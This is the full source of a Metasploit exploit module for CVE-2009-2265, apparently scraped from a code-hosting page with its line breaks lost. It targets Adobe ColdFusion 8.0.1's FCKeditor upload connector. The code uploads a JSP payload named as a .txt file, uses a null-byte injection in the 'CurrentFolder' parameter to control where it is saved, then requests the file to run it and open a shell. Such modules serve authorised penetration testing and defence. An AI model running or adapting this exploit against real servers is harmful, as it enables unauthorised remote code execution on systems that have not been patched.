Path: blob/master/modules/exploits/windows/http/coldfusion_fckeditor.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',15'Description' => %q{16This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload17and Execute vulnerability.18},19'Author' => [ 'MC' ],20'License' => MSF_LICENSE,21'Platform' => 'win',22'Privileged' => true,23'References' => [24[ 'CVE', '2009-2265' ],25[ 'OSVDB', '55684'],26],27'Targets' => [28[29'Universal Windows Target',30{31'Arch' => ARCH_JAVA,32'Payload' =>33{34'DisableNops' => true,35},36}37],38],39'DefaultOptions' => {40'SHELL' => 'cmd.exe'41},42'DefaultTarget' => 0,43'DisclosureDate' => '2009-07-03',44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options(53[54OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),55]56)57end5859def exploit60page = rand_text_alpha_upper(rand(10) + 1) + ".jsp"6162dbl = Rex::MIME::Message.new63dbl.add_part(payload.encoded, "application/x-java-archive", nil, "form-data; name=\"newfile\"; filename=\"#{rand_text_alpha_upper(8)}.txt\"")64file = dbl.to_s65file.strip!6667print_status("Sending our POST request...")6869res = send_request_cgi(70{71'uri' => normalize_uri(datastore['FCKEDITOR_DIR']),72'query' => "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00",73'version' => '1.1',74'method' => 'POST',75'ctype' => 'multipart/form-data; boundary=' + dbl.bound,76'data' => file,77}, 578)7980if (res and res.code == 200 and res.body =~ /OnUploadCompleted/)81print_status("Upload succeeded! Executing payload...")8283send_request_raw(84{85# default path in Adobe ColdFusion 8.0.1.86'uri' => '/userfiles/file/' + page,87'method' => 'GET',88}, 589)9091handler92else93print_error("Upload Failed...")94return95end96end97end9899100